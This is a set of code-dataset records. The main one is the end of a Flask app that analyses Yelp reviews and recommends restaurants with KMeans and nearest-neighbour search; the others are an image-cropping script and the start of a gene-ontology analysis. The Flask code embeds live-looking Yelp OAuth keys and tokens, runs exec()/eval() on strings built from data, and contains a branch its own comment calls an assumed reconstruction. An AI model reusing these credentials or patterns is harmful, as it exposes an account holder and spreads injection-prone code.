Counter()\r\n\t\t\tplt.figure(figsize=(15,5))\r\n\t\t\tfor word in newlist:\r\n\t\t\t\tcnt[word]+=1\r\n\t\t\tfrequency_list=pd.DataFrame(list(cnt.items())).sort_values(1,ascending=False)\r\n\t\t\tmenu=list(pd.DataFrame(list(cnt.items()))[0].unique())\r\n\t\t\tcol=5\r\n\t\t\trow=len(menu)//col\r\n\t\t\tmenu=np.array(menu[0:col*row])\r\n\t\t\tmenu_list=pd.DataFrame(menu.reshape(row,col))\r\n\t\t\tif len(frequency_list)>20:\r\n\t\t\t\tfrequency_list=frequency_list[0:20]\r\n\t\t\tglobal label_food\r\n\t\t\tnum_food=list(frequency_list[1])\r\n\t\t\tlabel_food=list(frequency_list[0])\r\n\t\t\tfig=plt.bar(range(len(num_food)),num_food)\r\n\t\t\tplt.xticks(range(len(num_food)), label_food)\r\n\t\t\tplt.xticks(rotation=30,fontsize=10)\r\n\t\t\tplt.savefig('static/review_distribution.png')\r\n\r\n\r\n\r\n\t\t\treturn render_template('reviewoutput.html', data=menu_list.to_html(),keyword=keyword,ave_rate=ave_star,std_rate=std_star,\r\n\t\t\t\tlink=get_review_links(keyword), mapfile = 'reviewmap.html')\r\n\r\n\t\telse:\r\n\t\t\treturn 'We cannot find restaurant:%s' %keyword\r\n\r\n\treturn render_template('reviewparams.html', form=form)\r\n\r\n\r\n\r\n@app.route(\"/review/feature/\", methods=['GET','POST'])\r\ndef review_feature():\r\n\r\n\t# feature-block-1 concordance_function\r\n\tdef concordance(text,word,width):\r\n\t\tlocs = [loc for loc, x in enumerate(text) if x.lower() == word.lower()]\r\n\t\tfragments = list()\r\n\t\tfor loc in locs:\r\n\t\t\tstart = max(0,loc-width)\r\n\t\t\tend = min(len(text),loc+width)\r\n\t\t\tfragments.append(' '.join(text[start:end]))\r\n\t\treturn fragments\r\n\r\n\t# feature-block-2 get_concordance_sentiment_function\r\n\tdef get_concordance_sentiment(text,word,width):\r\n\t\tif len(str(nearby_content))<20:\r\n\t\t\treturn 0\r\n\t\tsentences = concordance(text,word,width)\r\n\t\tpos=0\r\n\t\tneg=0\r\n
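\t\t# tally positive vs negative opinion words inside each concordance window\r\n\t\tfor sent in sentences:\r\n\t\t\tfor word in sent.split():\r\n\t\t\t\tif word in 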
positive_words:\r\n\t\t\t\t\tpos+=1\r\n\t\t\t\tif word in negative_words:\r\n\t\t\t\t\tneg+=1\r\n\t\tif not pos and not neg:\r\n\t\t\treturn 1\r\n\t\tif pos and not neg:\r\n\t\t\treturn 10\r\n\t\telse:\r\n\t\t\treturn pos/neg\r\n\r\n\r\n\t# review-block-3: get_words_function\r\n\tdef get_words(url):\r\n\t\twords = requests.get(url).content.decode('latin-1')\r\n\t\tword_list = words.split('\\n')\r\n\t\tindex = 0\r\n\t\twhile index < len(word_list):\r\n\t\t\tword = word_list[index]\r\n\t\t\tif ';' in word or not word:\r\n\t\t\t\tword_list.pop(index)\r\n\t\t\telse:\r\n\t\t\t\tindex+=1\r\n\t\treturn word_list\r\n\tp_url = 'http://ptrckprry.com/course/ssd/data/positive-words.txt'\r\n\tn_url = 'http://ptrckprry.com/course/ssd/data/negative-words.txt'\r\n\tpositive_words = get_words(p_url)\r\n\tnegative_words = get_words(n_url)\r\n\r\n\t# feature-block-4: main\r\n\tglobal text\r\n\tglobal label_food\r\n\tform = featureForm()\r\n\r\n\tif form.validate_on_submit():\r\n\r\n\t\tvalue1=form.box1.data\r\n\t\tvalue2=form.box2.data\r\n\t\tvalue3=form.box3.data\r\n\t\tvalue4=form.box4.data\r\n\t\tvalue5=form.box5.data\r\n\t\tvalue6=form.box6.data\r\n\t\tvalue7=form.box7.data\r\n\t\tvalue8=form.box8.data\r\n\t\tvalue9=form.box9.data\r\n\t\tvalue10=form.box10.data\r\n\t\tvalue11=form.box11.data\r\n\t\tvalue12=form.box12.data\r\n\t\tvalue13=form.box13.data\r\n\t\tvalue14=form.box14.data\r\n\t\tvalue15=form.box15.data\r\n\t\tvalue16=form.box16.data\r\n\t\tvalue17=form.box17.data\r\n\t\tvalue18=form.box18.data\r\n\t\tvalue19=form.box19.data\r\n\t\tvalue20=form.box20.data\r\n\t\tvalue_all=form.box_all.data\r\n\t\tlogic_array=[value1,value2,value3,value4,value5,value6,value7,value8,\\\r\n\t\tvalue9,value10,value11,value12,value13,value14,value15,value16,\\\r\n\t\tvalue17,value18,value19,value20]\r\n\t\tif value_all==True:\r\n\t\t\tlogic_array=[True for _ in range(0,20)]\r\n\t\tmylabel=pd.DataFrame(label_food)\r\n\t\tfeature_list=list(mylabel[logic_array][0])\r\n\r\n\r\n\t\tglobal rates\r\n\t\tglobal rates_name_str\r\n\t\tglobal nearby\r\n\t\trates=list()\r\n\t\trates_name_str='['\r\n\t\ttext_content=nltk.Text(text.split())\r\n\t\tmatplotlib.style.use('seaborn-colorblind')\r\n\r\n\t\tif len(feature_list)<4:\r\n\t\t\tCOL_NUM=len(feature_list)\r\n\t\t\tROW_NUM=1\r\n\t\telse:\r\n\t\t\tCOL_NUM=4\r\n\t\t\tif len(feature_list)%COL_NUM!=0:\r\n\t\t\t\tROW_NUM=len(feature_list)//COL_NUM+1\r\n\t\t\telse:\r\n\t\t\t\tROW_NUM=len(feature_list)//COL_NUM\r\n\r\n\t\tfig, axes = plt.subplots(ROW_NUM, COL_NUM, figsize=(12,12))\r\n\r\n\t\tfor i in range(0,COL_NUM*ROW_NUM):\r\n\t\t\tif i < len(feature_list):\r\n\t\t\t\texec('global feature'+str(i+1)+'\\n'+'feature'+str(i+1)+'=feature_list['+str(i)+']')\r\n\t\t\t\texec('global nearby\\nnearby=str(concordance(text_content,feature'+str(i+1)+',10))')\r\n\t\t\t\texec('global nearby_content\\nnearby_content=nltk.Text(nearby.split())')\r\n\t\t\t\texec('global rates\\nrates.append(get_concordance_sentiment(nearby_content,feature'+str(i+1)+',10))')\r\n\t\t\t\trates_name_str+='feature'+str(i+1)+','\r\n\r\n\t\t\tif len(feature_list)>1:\r\n\t\t\t\tif len(feature_list)>4:\r\n\t\t\t\t\tax = axes[i//COL_NUM, i%COL_NUM]\r\n\t\t\t\telse:\r\n\t\t\t\t\tax = axes[i%COL_NUM]\r\n\t\t\t\tif i<len(feature_list):\r\n\t\t\t\t\t# assumed reconstruction: the original body of this branch was lost to stripped '<...>' markup;\r\n\t\t\t\t\t# drawing each feature's concordance wordcloud is the most plausible content\r\n\t\t\t\t\twordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(nearby)\r\n\t\t\t\t\tax.imshow(wordcloud)\r\n\t\t\t\t\tax.set_title(feature_list[i])\r\n\t\t\t\t\tax.axis('off')\r\n\t\t\t\telse:\r\n\t\t\t\t\tax.axis('off')\r\n\t\tif len(feature_list)>1:\r\n\t\t\tfig.savefig('static/many_wordcloud.png')\r\n\t\trates_name_str+=']'\r\n\r\n\r\n\t\tax=pd.DataFrame({'rating':rates}).plot(kind='bar',fontsize=15,figsize=(15,5))\r\n\t\tax.set_xticklabels(eval(rates_name_str),fontsize=11,rotation=20)\r\n\t\tfig=ax.get_figure()\r\n
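\t\t# scores come from get_concordance_sentiment: a positive/negative hit ratio (10 when only positive words appear, 1 when none do)\r\n\t\tfig.suptitle('Scores of Selected Food', 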
fontsize=35)\r\n\t\tfig.savefig('static/feature_rating.png')\r\n\r\n\t\treturn render_template('featureoutput.html')\r\n\treturn render_template('featureparams.html', form=form, label_food=label_food)\r\n\r\n\r\n\r\n@app.route(\"/recommend0/\", methods=['GET','POST'])\r\ndef recommend0():\r\n\treturn render_template('recommend0.html', link=get_recommend1_links())\r\n\r\n@app.route('/recommend0/recommend1/',methods=['GET','POST'])\r\ndef recommend1():\r\n\tform = recommendForm1()\r\n\r\n\tuser[\"yelping_since\"]=pd.to_datetime(user[\"yelping_since\"])\r\n\treview[\"review_len\"] = [len(t) for t in review[\"text\"]]\r\n\r\n\tb_r=pd.merge(business, review, on='business_id',how='inner')\r\n\tb_r_u=pd.merge(b_r, user, on='user_id',how='inner')\r\n\tb_r_u1 = b_r_u[b_r_u['review_count_x'] >= 10]\r\n\tuser0 = b_r_u1[['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'stars_y', 'latitude', 'longitude', 'votes.cool_y', 'votes.funny_y', 'votes.useful_y']]\r\n\tuser1 = user0[user0['stars_y'] == 5]\r\n\tuser2 = user1[user1['votes.cool_y'] >= 1]\r\n\tuser3 = user2[user2['votes.funny_y'] >= 1]\r\n\tuser4 = user3[user3['votes.useful_y'] >= 10]\r\n\tuser4.reset_index().drop('index', 1)\r\n\tuser4['coolratio'] = user4['votes.cool_y']/(user4['votes.cool_y'] + user4['votes.funny_y'])\r\n\tuser5 = user4[['coolratio']]\r\n\tkmeans = KMeans(n_clusters=5, random_state=0).fit(user5)\r\n\tuser4['labels'] = kmeans.labels_\r\n\r\n\tcluster0 = user4[user4['labels'] == 0][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster0 = cluster0.drop_duplicates()\r\n\tcluster0 = cluster0\r\n\r\n\tcluster1 = user4[user4['labels'] == 1][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster1 = cluster1.drop_duplicates()\r\n\r\n\tcluster2 = user4[user4['labels'] == 2][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n 'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n 'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n 'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster2 = cluster2.drop_duplicates()\r\n\r\n\tcluster3 = user4[user4['labels'] == 3][['user_id', 'business_id', 'name_x', 
'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n        'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n        'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n        'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster3 = cluster3.drop_duplicates()\r\n\r\n\tcluster4 = user4[user4['labels'] == 4][['user_id', 'business_id', 'name_x', 'stars_x', 'review_count_x', 'attributes.Ambience.touristy', 'attributes.Ambience.intimate', \\\r\n        'attributes.Ambience.casual', 'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'categories', \\\r\n        'attributes.Good For.breakfast', 'attributes.Good For.lunch', 'attributes.Good For.dinner', 'attributes.Good For.latenight', \\\r\n        'attributes.Attire', 'attributes.Price Range', 'latitude', 'longitude']]\r\n\tcluster4 = cluster4.drop_duplicates()\r\n\r\n\tdef recommend1_1(cool,funny):\r\n\r\n\t\tif funny == 'f1':\r\n\t\t\tfunnynum = 1\r\n\t\tif funny == 'f2':\r\n\t\t\tfunnynum = 2\r\n\t\tif funny == 'f3':\r\n\t\t\tfunnynum = 3\r\n\t\tif funny == 'f4':\r\n\t\t\tfunnynum = 4\r\n\t\tif funny == 'f5':\r\n\t\t\tfunnynum = 5\r\n\r\n\t\tif cool == 'c1':\r\n\t\t\tcoolnum = 1\r\n\t\tif cool == 'c2':\r\n\t\t\tcoolnum = 2\r\n\t\tif cool == 'c3':\r\n\t\t\tcoolnum = 3\r\n\t\tif cool == 'c4':\r\n\t\t\tcoolnum = 4\r\n\t\tif cool == 'c5':\r\n\t\t\tcoolnum = 5\r\n\r\n\t\tratio = coolnum/(funnynum+coolnum)\r\n\t\tmycluster = kmeans.predict([[ratio]])[0]  # predict expects a 2-D sample array\r\n\t\tif mycluster == 0:\r\n\t\t\tresult = cluster0\r\n\t\tif mycluster == 1:\r\n\t\t\tresult = cluster1\r\n\t\tif mycluster == 2:\r\n\t\t\tresult = cluster2\r\n\t\tif mycluster == 3:\r\n\t\t\tresult = cluster3\r\n\t\tif mycluster == 4:\r\n\t\t\tresult = cluster4\r\n\t\t\r\n\t\treturn result\r\n\r\n\r\n\tif form.validate_on_submit():\r\n\t\tfunny = request.form.get('funny')\r\n\t\tcool = request.form.get('cool')\r\n\r\n\t\tglobal recommend_1\r\n\t\trecommend_1 = recommend1_1(cool, funny)\r\n\t\t\r\n\t\treturn redirect(url_for('recommend2'))\r\n\r\n\treturn render_template('recommend1.html', form=form)\r\n\r\n@app.route('/recommend0/recommend1/recommend2/',methods=['GET','POST'])\r\ndef recommend2():\r\n\r\n\tform = recommendForm2()\r\n\r\n\tglobal recommend_1\r\n\r\n\tdef recommend2_1(category, time, purpose):\r\n\t\tbusiness = recommend_1[recommend_1['categories'].str.contains(category, case = False)]\r\n\r\n\t\tif time == 't1':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.breakfast'] == True]\r\n\t\tif time == 't2':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.lunch'] == True]\r\n\t\tif time == 't3':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.dinner'] == True]\r\n\t\tif time == 't4':\r\n\t\t\tbusiness1 = business[business['attributes.Good For.latenight'] == True]\r\n\t\tif time == 't5':\r\n\t\t\tbusiness1 = business\r\n\r\n\t\tintimate = business1[business1['attributes.Ambience.intimate'] == True]\r\n\t\ttouristy = business1[business1['attributes.Ambience.touristy'] == True]\r\n\t\tcasual = business1[business1['attributes.Ambience.casual'] == True]\r\n\t\tromantic = business1[business1['attributes.Ambience.romantic'] == True]\r\n\t\tupscale = business1[business1['attributes.Ambience.upscale'] == True]\r\n
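\r\n\t\t# map the stated purpose to an ambience mix (p1 dating, p2 business, p3 friends, p4 families, p5 single, p6 tourist)\r\n\t\tif purpose == \"p1\":\r\n\t\t\tbusiness2 = pd.concat([intimate, romantic])\r\n\t\tif purpose == \"p2\":\r\n\t\t\tbusiness2 = pd.concat([intimate, 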
upscale])\r\n\t\tif purpose == \"p3\":\r\n\t\t\tbusiness2 = pd.concat([intimate, casual])\r\n\t\tif purpose == \"p4\":\r\n\t\t\tbusiness2 = pd.concat([intimate, casual])\r\n\t\tif purpose == \"p5\":\r\n\t\t\tbusiness2 = pd.concat([intimate, casual, upscale])\r\n\t\tif purpose == \"p6\":\r\n\t\t\tbusiness2 = pd.concat([casual, touristy])\r\n\r\n\t\treturn business2.drop('user_id', 1).drop_duplicates()\r\n\t\r\n\tif form.validate_on_submit():\r\n\t\tcategory = request.form.get('category')\r\n\t\ttime = request.form.get('time')\r\n\t\tpurpose = request.form.get('purpose')\r\n\t\tglobal recommend_2\r\n\t\trecommend_2 = recommend2_1(category, time, purpose)\r\n\t\trecommend_2 = recommend_2.reset_index().drop('index', 1)\r\n\t\tif len(recommend_2) == 0:\r\n\t\t\treturn render_template('recommend2r-1.html', form=form)\r\n\t\telse:\r\n\t\t\treturn redirect(url_for('recommend3'))\r\n\r\n\treturn render_template('recommend2.html', form=form)\r\n\r\n@app.route('/recommend0/recommend1/recommend2/recommend3/',methods=['GET','POST'])\r\ndef recommend3():\r\n\t\r\n\tform = recommendForm3()\r\n\r\n\trestaurant_pic1 = ['cheap1.jpg', 'business2.jpg', 'romantic1.jpg','cheap2.jpg']\r\n\trestaurant_pic2 = ['tourist1.jpg', 'tourist2.jpg', 'romantic2.jpg', 'business1.jpg']\r\n\r\n\tglobal recommend_2\r\n\r\n\tmyframe = recommend_2[['attributes.Ambience.touristy', 'attributes.Ambience.intimate', 'attributes.Ambience.casual', \\\r\n\t\t\t\t\t\t'attributes.Ambience.romantic', 'attributes.Ambience.upscale', 'attributes.Price Range', 'attributes.Attire']]\r\n\tmyframe[['attributes.Ambience.touristy', 'attributes.Ambience.intimate', 'attributes.Ambience.casual', 'attributes.Ambience.romantic', \\\r\n \t'attributes.Ambience.upscale']] = myframe[['attributes.Ambience.touristy', 'attributes.Ambience.intimate', 'attributes.Ambience.casual', \\\r\n 'attributes.Ambience.romantic', 'attributes.Ambience.upscale']].astype(int)\r\n\tmyframe = myframe.replace(to_replace=['casual', 'formal', 'dressy'], value=[0, 1, 0.8])\r\n\t#myframe1 = np.array(myframe)\r\n\tmyframe1 = preprocessing.scale(myframe)\r\n\t#myframe\r\n\t\r\n\tfea_matrix = np.array([[0.1,0.3,0.8,0.6,0,1,0],[0.1,0.5,0.1,0.4,0.9,4,0.8],[0.1,0.6,0.5,0.9,0.7,4,0.7],[0.6,0.1,1,0,0,1,0],[0.8,0.1,0.9,0.1,0.2,1,0],[0.9,0.5,0.7,0.2,0.4,3,0.1],[0.8,0.8,0.5,1,0.8,4,0.6],[0.1,1,0,0.3,1,4,1]])\r\n\tfea_matrix = preprocessing.scale(fea_matrix)\r\n\r\n\tdef recommend3_1(pic_choice):\r\n\t\tif pic_choice == \"p1\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[0]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p2\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[1]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p3\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[2]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p4\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[3]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p5\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[4]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p6\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[5]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p7\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[6]]))\r\n\t\t\tnbrs = 
NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tif pic_choice == \"p8\":\r\n\t\t\tX = np.concatenate((myframe1, [fea_matrix[7]]))\r\n\t\t\tnbrs = NearestNeighbors(n_neighbors=6, algorithm='ball_tree').fit(X)\r\n\t\tdistances, indices = nbrs.kneighbors(X)\r\n\t\tmyindex = np.delete(indices[-1], 0)\r\n\t\trecommend_3 = recommend_2[['business_id', 'name_x', 'stars_x', 'review_count_x', 'latitude', 'longitude']].ix[myindex]\r\n\t\treturn recommend_3\r\n\r\n\tif form.validate_on_submit():\r\n\t\tpic_choice = request.form.get('pic_choice')\r\n\t\tglobal recommend_3\r\n\t\tif len(recommend_2) <= 5:\r\n\t\t\trecommend_3 = recommend_2[['business_id', 'name_x', 'stars_x', 'review_count_x', 'latitude', 'longitude']]\r\n\t\telse:\r\n\t\t\trecommend_3 = recommend3_1(pic_choice)\r\n\r\n\t\tresult = recommend_3.sort_values('review_count_x', ascending = False).head(1)\r\n\r\n\t\tlat = float(result[\"latitude\"])\r\n\t\tlnt = float(result[\"longitude\"])\r\n\r\n\t\t#name=str(result[\"name_x\"])[0]\r\n\t\tname = list(result[\"name_x\"])[0]\r\n\r\n\t\tfrom yelp.client import Client\r\n\t\tfrom yelp.oauth1_authenticator import Oauth1Authenticator\r\n\r\n\t\tauth = Oauth1Authenticator(\r\n \t\tconsumer_key='dr8aE-pryV4EwOTn1AOrgQ',\r\n \t\tconsumer_secret='Vppa6lir0US1wr76S-qkilN-Bgk',\r\n \t\ttoken='oFoNB1dOAUd5gt1lKqYhTM3NYp5VDXX1',\r\n \t\ttoken_secret='GQEAGbEaNpk50C6_92MyzomHF5o'\r\n\t\t\t)\r\n\r\n\t\tclient = Client(auth)\r\n\r\n\t\tparams = {\"sort\": 0, 'radius_filter': 100}\r\n\r\n\t\tthis_count = 0\r\n\r\n\r\n\t\tresponse = client.search_by_coordinates(lat, lnt, **params)\r\n\t\tbusiness_list = response.businesses\r\n\t\tfor this_bus in business_list:\r\n\t\t\tif this_bus.name == name:\r\n\t\t\t\tmyurl = this_bus.url\r\n\t\t\t\tthis_count = 1\r\n\t\t\t\tbreak\r\n\r\n\t\t#this_count = 0\t\t\t\r\n\t\t \r\n\t\t#myurl = response.businesses[0].url\r\n\r\n\t\tif this_count == 1:\r\n\t\t\treturn redirect(myurl)\r\n\t\telse:\r\n\t\t\tlat = list(result[\"latitude\"])\r\n\t\t\tlnt = list(result[\"longitude\"])\r\n\t\t\tgmap = gmplot.GoogleMapPlotter(np.mean(lat),np.mean(lnt),12)\r\n\t\t\tgmap.scatter(lat, lnt, '#3B0B39', size=200, marker=False)\r\n\t\t\tgmap.draw(\"templates/reviewmap.html\")\r\n\r\n\t\t\treturn render_template('recommendoutput.html', data=result.to_html(), mapfile = 'reviewmap.html', name=list(result[\"name_x\"])[0], \r\n\t\t\t\tstars=list(result[\"stars_x\"])[0], reviewcount=int(list(result[\"review_count_x\"])[0])) \r\n\treturn render_template('recommend3.html', form=form, pics=list(form.pic_choice), labels1=restaurant_pic1, labels2=restaurant_pic2)\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug = True)","sub_path":"Yelp_flask.py","file_name":"Yelp_flask.py","file_ext":"py","file_size_in_byte":37927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"255538370","text":"#!/usr/bin/env python3\n# filename: img_cropper.py\n\nfrom PIL import Image, ImageOps\nimport os\n\ndef crop_pil_img(pil_img):\n border = (32, 32, 32, 32) # left, top, right, bottom\n cropped_pil_img = ImageOps.crop(pil_img, border)\n return cropped_pil_img\n\ndef crop_n_save_img(img_filepath,cropped_filepath):\n pil_img = Image.open(img_filepath, 'r')\n cropped_pil_img = crop_pil_img(pil_img)\n cropped_pil_img.save(cropped_filepath)\n\n#def crop_n_save_all_imgs_in_folder(folder_path):\n# In general, need to have a robust naming system across many folders.\n# crop_n_save_img()\n\n\nsrc_path_base = 
'../../input-data/1-pre-processed/B/'\ndst_path_base = '../../input-data/2-processed/B/'\ni = 0\nfor dirPath, subDirs, files in os.walk(src_path_base+'Normal/'):\n for file in files:\n if file.endswith(\".jpg\"):\n i += 1\n crop_n_save_img( os.path.join(dirPath, file) ,\n dst_path_base+f'Normal/{i:02d}.jpg' )\ni = 0\nfor dirPath, subDirs, files in os.walk(src_path_base+'Abnormal/'):\n for file in files:\n if file.endswith(\".jpg\"):\n i += 1\n crop_n_save_img( os.path.join(dirPath, file) ,\n dst_path_base+f'Abnormal/{i:02d}.jpg' )\n\n","sub_path":"ai_vision_for_endoscopy/img-processing/img_cropper_old2.py","file_name":"img_cropper_old2.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"228969078","text":"\n# RA, 2018-01-15\n\n## ================== IMPORTS :\n\nimport re\nimport os\nimport sys\nimport math\nimport pickle\nimport random\nimport inspect\nimport numpy as np\nimport networkx as nx\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom scipy.sparse import lil_matrix\nfrom collections import defaultdict\nfrom string import ascii_lowercase\nfrom numpy.matlib import repmat\nfrom scipy import stats\nfrom scipy.constants import golden as phi\nfrom itertools import chain\nfrom multiprocessing import cpu_count\nfrom joblib import Parallel, delayed\nfrom progressbar import ProgressBar as Progress\n\n# http://scikit-learn.org/stable/modules/generated/sklearn.manifold.TSNE.html\nfrom sklearn.manifold import TSNE\n\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html\nfrom scipy.cluster.hierarchy import linkage\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.leaves_list.html\nfrom scipy.cluster.hierarchy import leaves_list\n\nfrom sklearn.metrics.pairwise import euclidean_distances as euc_dist\n\n# \nfrom networkx.drawing.nx_agraph import graphviz_layout\n\n## ==================== INPUT :\n\nIFILE = {\n\t'BC data' : \"OUTPUT/0_select/UV/GSE75688_GEO_processed_Breast_Cancer_raw_TPM_matrix.txt-selected.pkl\",\n\t'GO graph' : \"OUTPUT/0_go-graph/UV/go-graph.pkl\",\n\t'GO=>CI' : \"OUTPUT/0_go2ci/UV/go2ci.pkl\",\n\t\n\t'tsne runs' : \"OUTPUT/C_goordinates/tsne_runs.pkl\",\n\t'classified' : \"OUTPUT/D_classifier-nn/classified_epochs=9000.pkl\",\n}\n\n# Check existence of input files\nfor f in IFILE.values() :\n\tassert(os.path.isfile(f)), \"File {} not found.\".format(f)\n\n## =================== OUTPUT :\n\nOFILE = {\n\t\n\t'tsne' : \"OUTPUT/C_goordinates-D/tsne_dim={dim}_run={run}_sub={sub}.{ext}\",\n\t'tsne info' : \"OUTPUT/C_goordinates-D/tsne_dim={dim}.txt\",\n}\n\n# Create output directories\nfor f in OFILE.values() :\n\tos.makedirs(os.path.dirname(f), exist_ok=True)\n\n## ==================== PARAM :\n\nPARAM = {\n\t# Figure formats\n\t'ext' : ['png', 'pdf'],\n\t\n\t# Number of parallel computing processes\n\t'#proc' : min(12, math.ceil(cpu_count() / 1.2)),\n}\n\nmpl.rcParams['axes.labelsize'] = 'large'\n\n## ====================== AUX :\n\n# Abbreviate a GO term t, truncating it to max_len characters\ndef abbr(t, max_len) :\n\tD = { \n\t\t\"replication\" : \"repl\",\n\t\t\"involved in\" : \"in\",\n\t\t\"regulation\" : \"regu\",\n\t\t\"synthesis\" : \"syn\",\n\t\t\"negative\" : \"neg\",\n\t\t\"positive\" : \"pos\",\n\t\t\"double\" : \"dbl\",\n\t\t\"single\" : \"sgl\",\n\t\t\"error\" : \"err\",\n\t}\n\t\n\tfor pair in D.items() : t = t.replace(*pair)\n\n\tif (len(t) > max_len) : t = t[0:(max_len-3)] + 
\"...\"\n\t\n\treturn t\n\n# This script\nTHIS = inspect.getsource(inspect.getmodule(inspect.currentframe()))\n\n## ====================== (!) :\n\ndef goordinate_trafo(GO_I, n_genes) :\n\tassert(type(GO_I) is list)\n\t\n\tT = lil_matrix((len(GO_I), n_genes))\n\t\n\tfor (n, (go, I)) in enumerate(GO_I) : \n\t\tT[n, I] = 1\n\t\n\treturn T\n\n\n# https://en.wikipedia.org/wiki/Silhouette_(clustering)\n# D = distance matrix\n# S = [[indices of cluster c] for each cluster c]\n# Returns the silhouette values by cluster\ndef silhouette(D, S) :\n\tassert(D.shape[0] == D.shape[1])\n\tdef md(i, c) : return np.mean([D[i, j] for j in c])\n\tA = { c : [md(i, c) for i in c] for c in S }\n\tB = { c : [min(md(i, d) for d in S if (d != c)) for i in c] for c in S }\n\ts = { c : [(b - a) / max(b, a) for (a, b) in zip(A[c], B[c]) if max(b, a)] for c in S }\n\t#for s in s.values() : print(sorted(s))\n\treturn s\n\n# Compute a distance matrix as (1 - cos(angle))\ndef cos_dist(X) :\n\t# Covariance & norm products\n\tC = np.tensordot(X, X, axes=([1], [1]))\n\tV = np.sqrt(np.outer(np.diag(C), np.diag(C)))\n\tV[V == 0] = 1\n\tD = 1 - (C / V)\n\treturn D\n\n# Clustering index\ndef CI(X, feature_axis) :\n\n\tdef dist(X) : return cos_dist(np.moveaxis(X, feature_axis, 1))\n\t#def dist(X) : return euc_dist(np.moveaxis(X, feature_axis, 1))\n\n\treturn np.mean([\n\t\tnp.sign(x) \n\t\tfor x in chain.from_iterable(silhouette(dist(X), S).values())\n\t])\n\n## ===================== DATA :\n\n#[ BC DATA ]#\n\n# Load the BC data\nBC_data = pickle.load(open(IFILE['BC data'], 'rb'))\n\n# Expression matrix\nX = BC_data['X']\n\n# Rearrange data axes\n(axis_gene, axis_smpl) = (0, 1)\nX = np.moveaxis(X, BC_data['axis_gene'], axis_gene)\n\n# Number of samples / genes in the expression matrix\n(n_samples, n_genes) = (X.shape[axis_smpl], X.shape[axis_gene])\n\n# ENSG IDs\nBC_E = BC_data['gene_id']\nassert(len(BC_E) == X.shape[axis_gene]), \"Inconsistent gene info\"\n\n# E2I : BC ENSG --> Gene indices in BC data\nE2I = dict(zip(BC_E, range(len(BC_E))))\n\n# Clusters/groups\nG2S = { \n\tg : tuple(s for (s, h) in SH)\n\tfor (g, SH) in BC_data['B2SH'].items() \n}\nS = sorted(G2S.values())\n\n#[ GO DATA ]#\n\n# Clustering indices data bundle\nCI_data = pickle.load(open(IFILE['GO=>CI'], 'rb'))\n\n# GO2E : GO ID --> Clustering index\nGO2CI = CI_data['GO2CI']\n\n# 